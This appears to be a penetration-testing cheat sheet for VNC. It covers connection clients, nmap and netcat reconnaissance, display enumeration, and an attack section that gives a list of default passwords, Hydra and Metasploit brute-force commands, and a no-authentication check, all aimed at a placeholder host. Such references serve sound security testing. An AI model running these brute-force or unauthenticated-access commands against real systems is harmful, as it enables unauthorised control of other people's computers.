VNC (Virtual Network Computing)
Default Ports: 5900-5906
Virtual Network Computing (VNC) is a graphical desktop-sharing system that uses the Remote Frame Buffer (RFB) protocol to remotely control another computer. VNC transmits keyboard and mouse events from one computer to another, relaying graphical screen updates back. It's platform-independent and widely used for remote technical support, access to work computers, and server administration.
Connect
Using vncviewer
# Basic connection
vncviewer target.com:5900
# With display number (5900 + display)
vncviewer target.com:0 # Port 5900
vncviewer target.com:1 # Port 5901
# With password file
vncviewer -passwd ~/.vnc/passwd target.com:0
Using remmina (GUI)
Remmina is a feature-rich remote desktop client that supports VNC, RDP, and other protocols:
Protocol: VNC
Server: target.com:5900
Username: (if required)
Password: password
Using TightVNC Viewer
# Windows
tvnviewer.exe target.com::5900
# Linux
vncviewer target.com:5900
Recon
Service Detection with Nmap
Use Nmap to detect VNC services and identify server capabilities.
nmap -p 5900-5906 target.com
Banner Grabbing
Connect to VNC services to gather version and service information.
Using netcat
# Using netcat
nc -vn target.com 5900
# Get VNC handshake
echo "" | nc target.com 5900
Using nmap
# Using nmap
nmap -p 5900-5906 -sV target.com
# Authentication check
nmap -p 5900 --script vnc-info target.com
# Brute force script
nmap -p 5900 --script vnc-brute target.com
Enumeration
Use various tools for detailed VNC enumeration and information gathering.
VNC Authentication Check
Determine VNC authentication methods and protocol versions.
# Check authentication type
nmap -p 5900 --script vnc-info target.com
# Output shows:
# - Protocol version (RFB 003.003, 003.007, 003.008)
# - Authentication types (None, VNC, Tight, Ultra, TLS, VeNCrypt)
# - Desktop name
Display Enumeration
Enumerate available VNC displays and sessions.
# Scan range of VNC ports
nmap -p 5900-5910 target.com
# Check each display
for i in {0..10}; do
echo "Display :$i (port $((5900+i)))"
nc -zv target.com $((5900+i))
done
Attack Vectors
Exploit various VNC vulnerabilities and misconfigurations for unauthorized access.
No Authentication
Test for VNC servers configured without authentication.
# Try connection without password
vncviewer target.com:5900
# Using Metasploit to check
use auxiliary/scanner/vnc/vnc_none_auth
set RHOSTS target.com
run
# If successful, you have immediate desktop access
Weak or Default Passwords
Test common default VNC passwords for unauthorized access.
# Common VNC passwords
password
12345678
vnc123
admin
administrator
# Try with vncviewer
vncviewer target.com:5900
# Enter password when prompted
Brute Force Attack
Brute force VNC passwords using various tools and techniques.
Using Hydra
hydra -P /usr/share/wordlists/rockyou.txt vnc://target.com
Using Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS target.com
set PASS_FILE passwords.txt
run